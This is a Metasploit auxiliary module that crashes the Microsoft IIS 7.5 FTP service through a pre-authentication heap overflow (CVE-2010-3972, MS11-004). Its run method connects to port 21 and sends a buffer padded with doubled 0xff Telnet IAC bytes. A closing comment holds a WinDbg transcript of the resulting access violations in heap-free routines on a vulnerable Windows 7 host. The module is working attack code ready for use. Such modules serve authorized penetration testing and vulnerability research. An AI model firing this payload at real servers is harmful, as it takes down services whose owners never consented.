modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server Encoded Response Overflow Trigger',
'Description' => %q{
This module triggers a heap overflow when processing a specially crafted
FTP request containing Telnet IAC (0xff) bytes. When constructing the response,
the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.
This issue can be triggered pre-auth and may in fact be exploitable for
remote code execution.
},
'Author' =>
[
'Matthew Bergin', # Original discovery/disclosure
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-3972' ],
[ 'OSVDB', '70167' ],
[ 'BID', '45542' ],
[ 'MSB', 'MS11-004' ],
[ 'EDB', '15803' ],
[ 'URL', 'https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/' ]
],
'DisclosureDate' => '2010-12-21'))
register_options(
[
Opt::RPORT(21)
])
end
def run
connect
banner = sock.get_once(-1, 10)
print_status("banner: #{banner.to_s.strip}")
buf = Rex::Text.pattern_create(1024)
# the 0xff's must be doubled, the server will un-and-re-double them.
ffs = "\xff" * (0x7e*2)
# Continuing after the first exception sometimes leads to this being dereferenced.
buf[0,3] = [0xdeadbe00].pack('V')[1,3]
buf[4,ffs.length] = ffs
buf << "\r\n"
sock.put(buf)
disconnect
rescue ::Rex::ConnectionError
end
end
=begin
This transcript is from a vulnerable Win7 machine:
Processing initial command '$<script.wdbg'
0:012> $<script.wdbg
0:012> bp ftpsvc+3f360 ".printf \"buf @ 0x%x, len: 0x%x (end: 0x%x)\\n\", eax, ecx, (eax+ecx);g"
0:012> bp ftpsvc+3f382 ".printf \"extra len: 0x%x\\n\", edi;g"
0:012> bp ftpsvc+3f395 ".printf \"(0x%x+0x%x) 0x%x > (0x%x-0x%x) 0x%x ??\\n\", ecx, edi, ebx, poi(esi+14), poi(esi+8), edx;g"
0:012> bp ftpsvc+3f397
0:012> bp ftpsvc+3f39f "r @$t0 = ecx;g"
0:012> bp ftpsvc+3f3a4 ".printf \"allocated 0x%x bytes at 0x%x (end: 0x%x)\\n\", @$t0, eax, (eax+@$t0);g"
0:012> *bp ftpsvc+3f3c0 ".printf \"writing 0xff to 0x%x\\n\", eax;g"
0:012> *bp ftpsvc+3f3c6 ".printf \"writing 0x%x to 0x%x\\n\", (edx & 0xff), eax;g"
0:012> g
buf @ 0x97f81c, len: 0x1b (end: 0x97f837)
extra len: 0x0
buf @ 0x3e4ca0, len: 0x3a4 (end: 0x3e5044)
extra len: 0x7e
(0x3a4+0x7e) 0x422 > (0x422-0x0) 0x422 ??
Breakpoint 3 hit
eax=003e4ca0 ebx=00000422 ecx=000003a4 edx=00000422 esi=00dcfaf8 edi=0000007e
eip=6c63f397 esp=00dcfaac ebp=00dcfac0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ftpsvc!TELNET_STREAM_CONTEXT::OnSendData+0x49:
6c63f397 8b7df8 mov edi,dword ptr [ebp-8] ss:0023:00dcfab8=00000000
0:007> g
(2f8.a40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003e50d0 ebx=00000000 ecx=ffffffff edx=003e4898 esi=003e4890 edi=002f0000
eip=778f30d7 esp=00dcf990 ebp=00dcfa70 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
ntdll!RtlpFreeHeap+0x4d6:
778f30d7 8b19 mov ebx,dword ptr [ecx] ds:0023:ffffffff=????????
0:007> g
(2f8.a40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003e4898 ebx=003e4c98 ecx=deadbe27 edx=ffffff41 esi=003e4890 edi=002f0000
eip=778f6030 esp=00dcf950 ebp=00dcf978 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpCoalesceFreeBlocks+0x268:
778f6030 8b4904 mov ecx,dword ptr [ecx+4] ds:0023:deadbe2b=????????
=end